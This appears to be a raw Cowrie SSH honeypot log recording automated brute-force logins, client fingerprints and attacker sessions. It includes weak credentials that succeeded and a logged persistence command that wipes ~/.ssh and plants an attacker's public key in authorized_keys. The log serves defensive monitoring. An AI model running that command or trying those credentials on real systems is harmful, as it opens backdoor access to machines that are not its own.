{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:23:32.492919Z","src_ip":"212.227.235.229","session":"5954c662e6ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:23:32.755810Z","src_ip":"212.227.235.229","session":"5954c662e6ae"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:23:33.545542Z","src_ip":"212.227.235.229","session":"5954c662e6ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:23:34.149417Z","src_ip":"212.227.235.229","session":"5954c662e6ae"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:23:34.150089Z","src_ip":"212.227.235.229","session":"5954c662e6ae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:34.413594Z","src_ip":"212.227.235.229","session":"5954c662e6ae"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:34.414701Z","src_ip":"212.227.235.229","session":"5954c662e6ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53580,"dst_ip":"1.2.3.4","dst_port":22,"session":"96b8330f9c1f","protocol":"ssh","message":"New connection: 212.227.235.229:53580 (1.2.3.4:22) [session: 96b8330f9c1f]","sensor":"my-vps","timestamp":"2025-08-28T06:23:38.967679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:23:38.969524Z","src_ip":"212.227.235.229","session":"96b8330f9c1f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:23:39.211997Z","src_ip":"212.227.235.229","session":"96b8330f9c1f"}
{"eventid":"cowrie.login.success","username":"root","password":"oracle","message":"login attempt [root/oracle] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:23:40.221368Z","src_ip":"212.227.235.229","session":"96b8330f9c1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:23:40.734419Z","src_ip":"212.227.235.229","session":"96b8330f9c1f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:23:40.735134Z","src_ip":"212.227.235.229","session":"96b8330f9c1f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:23:40.736237Z","src_ip":"212.227.235.229","session":"96b8330f9c1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:40.984847Z","src_ip":"212.227.235.229","session":"96b8330f9c1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:23:41.622624Z","src_ip":"212.227.235.229","session":"96b8330f9c1f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:23:41.623355Z","src_ip":"212.227.235.229","session":"96b8330f9c1f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:23:41.873713Z","src_ip":"212.227.235.229","session":"96b8330f9c1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:41.874749Z","src_ip":"212.227.235.229","session":"96b8330f9c1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53586,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf1e38af24eb","protocol":"ssh","message":"New connection: 212.227.235.229:53586 (1.2.3.4:22) [session: cf1e38af24eb]","sensor":"my-vps","timestamp":"2025-08-28T06:23:42.105017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:23:42.106143Z","src_ip":"212.227.235.229","session":"cf1e38af24eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:23:42.339093Z","src_ip":"212.227.235.229","session":"cf1e38af24eb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:23:43.329525Z","src_ip":"212.227.235.229","session":"cf1e38af24eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44162,"dst_ip":"1.2.3.4","dst_port":22,"session":"cca576b2cfbd","protocol":"ssh","message":"New connection: 212.227.125.160:44162 (1.2.3.4:22) [session: cca576b2cfbd]","sensor":"my-vps","timestamp":"2025-08-28T06:23:43.349872Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:23:43.350522Z","src_ip":"212.227.125.160","session":"cca576b2cfbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62382,"dst_ip":"1.2.3.4","dst_port":22,"session":"54bd24b38be2","protocol":"ssh","message":"New connection: 212.227.125.160:62382 (1.2.3.4:22) [session: 54bd24b38be2]","sensor":"my-vps","timestamp":"2025-08-28T06:23:44.227320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:23:44.229023Z","src_ip":"212.227.125.160","session":"54bd24b38be2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:23:44.245489Z","src_ip":"212.227.125.160","session":"cca576b2cfbd"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:23:44.358881Z","src_ip":"212.227.125.160","session":"54bd24b38be2"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:44.563581Z","src_ip":"212.227.235.229","session":"cf1e38af24eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54274,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2be3ebf553a","protocol":"ssh","message":"New connection: 212.227.235.229:54274 (1.2.3.4:22) [session: b2be3ebf553a]","sensor":"my-vps","timestamp":"2025-08-28T06:23:44.813490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:23:44.814129Z","src_ip":"212.227.235.229","session":"b2be3ebf553a"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia","message":"login attempt [lucia/lucia] failed","sensor":"my-vps","timestamp":"2025-08-28T06:23:44.911596Z","src_ip":"212.227.125.160","session":"54bd24b38be2"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:23:44.917637Z","src_ip":"212.227.125.160","session":"cca576b2cfbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:23:45.055411Z","src_ip":"212.227.235.229","session":"b2be3ebf553a"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia1","message":"login attempt [lucia/lucia1] failed","sensor":"my-vps","timestamp":"2025-08-28T06:23:46.027756Z","src_ip":"212.227.125.160","session":"54bd24b38be2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:23:46.061722Z","src_ip":"212.227.235.229","session":"b2be3ebf553a"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:46.142110Z","src_ip":"212.227.125.160","session":"cca576b2cfbd"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:46.296184Z","src_ip":"212.227.235.229","session":"96b8330f9c1f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:46.303789Z","src_ip":"212.227.235.229","session":"b2be3ebf553a"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia123","message":"login attempt [lucia/lucia123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:23:47.142051Z","src_ip":"212.227.125.160","session":"54bd24b38be2"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia1234","message":"login attempt [lucia/lucia1234] failed","sensor":"my-vps","timestamp":"2025-08-28T06:23:48.256572Z","src_ip":"212.227.125.160","session":"54bd24b38be2"}
{"eventid":"cowrie.session.closed","duration":31.43539834022522,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:48.909957Z","src_ip":"8.222.212.69","session":"e68d933a9a91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47620,"dst_ip":"1.2.3.4","dst_port":22,"session":"54d3bb986c7f","protocol":"ssh","message":"New connection: 212.227.235.229:47620 (1.2.3.4:22) [session: 54d3bb986c7f]","sensor":"my-vps","timestamp":"2025-08-28T06:23:48.945379Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:23:48.946304Z","src_ip":"212.227.235.229","session":"54d3bb986c7f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:23:49.196363Z","src_ip":"212.227.235.229","session":"54d3bb986c7f"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia12345","message":"login attempt [lucia/lucia12345] failed","sensor":"my-vps","timestamp":"2025-08-28T06:23:49.368925Z","src_ip":"212.227.125.160","session":"54bd24b38be2"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:23:49.948763Z","src_ip":"212.227.235.229","session":"54d3bb986c7f"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:51.142337Z","src_ip":"212.227.125.160","session":"54bd24b38be2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:51.200641Z","src_ip":"212.227.235.229","session":"54d3bb986c7f"}
{"eventid":"cowrie.session.closed","duration":31.59149694442749,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:56.069029Z","src_ip":"212.227.235.229","session":"5e40cab6b5f2"}
{"eventid":"cowrie.session.connect","src_ip":"164.92.210.70","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"0724c1c69b9d","protocol":"ssh","message":"New connection: 164.92.210.70:6103 (1.2.3.4:22) [session: 0724c1c69b9d]","sensor":"my-vps","timestamp":"2025-08-28T06:23:58.019586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T06:23:58.047492Z","src_ip":"164.92.210.70","session":"0724c1c69b9d"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T06:23:58.070559Z","src_ip":"164.92.210.70","session":"0724c1c69b9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49624,"dst_ip":"1.2.3.4","dst_port":22,"session":"0db1c867b47e","protocol":"ssh","message":"New connection: 212.227.125.160:49624 (1.2.3.4:22) [session: 0db1c867b47e]","sensor":"my-vps","timestamp":"2025-08-28T06:23:58.544686Z"}
